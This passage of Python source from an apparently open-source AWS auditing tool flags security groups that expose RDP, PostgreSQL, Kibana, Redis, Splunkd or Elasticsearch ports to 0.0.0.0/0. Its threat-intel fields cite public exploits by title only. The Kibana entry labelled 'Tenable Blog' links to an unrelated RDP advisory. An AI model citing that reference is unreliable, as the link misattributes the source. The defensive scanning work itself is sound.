"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "3389" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rdp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.9] Security groups should not allow unrestricted Remote Desktop Protocol (RDP) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Remote Desktop Protocol (RDP) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0660: Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0610: Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0610",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_postgresql_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.10] Security groups should not allow unrestricted PostgreSQL datbase (TCP 5432) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "5432" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-postgresql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.10] Security groups should not allow unrestricted PostgreSQL datbase (TCP 5432) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted PostgreSQL datbase (TCP 5432) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "5432" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-postgresql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.10] Security groups should not allow unrestricted PostgreSQL datbase (TCP 5432) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted PostgreSQL datbase (TCP 5432) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_kibana_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.11] Security groups should not allow unrestricted access to Kibana (TCP 5601)"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "5601" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kibana-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.11] Security groups should not allow unrestricted access to Kibana (TCP 5601)",
"Description": "Security group "
+ sgName
+ " allows unrestricted access to Kibana (TCP 5601) on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "CVE-2019-7609: Exploit Script Available for Kibana Remote Code Execution Vulnerability",
"Source": "Tenable Blog",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Red Hat OpenShift: CVE-2019-7608: kibana: Cross-site scripting vulnerability permits perform destructive actions on behalf of other Kibana users",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2019-7608",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "5601" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kibana-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.11] Security groups should not allow unrestricted access to Kibana (TCP 5601)",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted access to Kibana (TCP 5601) on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "CVE-2019-7609: Exploit Script Available for Kibana Remote Code Execution Vulnerability",
"Source": "Tenable Blog",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Red Hat OpenShift: CVE-2019-7608: kibana: Cross-site scripting vulnerability permits perform destructive actions on behalf of other Kibana users",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2019-7608",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_redis_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.12] Security groups should not allow unrestricted Redis (TCP 6379) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "6379" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redis-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.12] Security groups should not allow unrestricted Redis (TCP 6379) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Redis (TCP 6379) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/47195",
},
{
"Category": "BACKDOOR",
"Value": "Redis: Improper Input Validation (CVE-2013-0178)",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redislabs-redis-cve-2013-0178",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "6379" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redis-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.12] Security groups should not allow unrestricted Redis (TCP 6379) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Redis (TCP 6379) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/47195",
},
{
"Category": "BACKDOOR",
"Value": "Redis: Improper Input Validation (CVE-2013-0178)",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redislabs-redis-cve-2013-0178",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_splunkd_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.13] Security groups should not allow unrestricted Splunkd (TCP 8089) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "8089" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-splunkd-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.13] Security groups should not allow unrestricted Splunkd (TCP 8089) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Splunkd (TCP 8089) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Splunk - Remote Command Execution",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/18245",
},
{
"Category": "BACKDOOR",
"Value": "Splunk Web Interface Login Utility",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/splunk_web_login",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "8089" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-splunkd-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.13] Security groups should not allow unrestricted Splunkd (TCP 8089) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Splunkd (TCP 8089) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Splunk - Remote Command Execution",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/18245",
},
{
"Category": "BACKDOOR",
"Value": "Splunk Web Interface Login Utility",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/splunk_web_login",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_elasticsearch1_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.14] Security groups should not allow unrestricted Elasticsearch (TCP 9200) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9200" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9200-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.14] Security groups should not allow unrestricted Elasticsearch (TCP 9200) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Elasticsearch (TCP 9200) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9200" and cidrIpRange != "0.0.0.0/0":
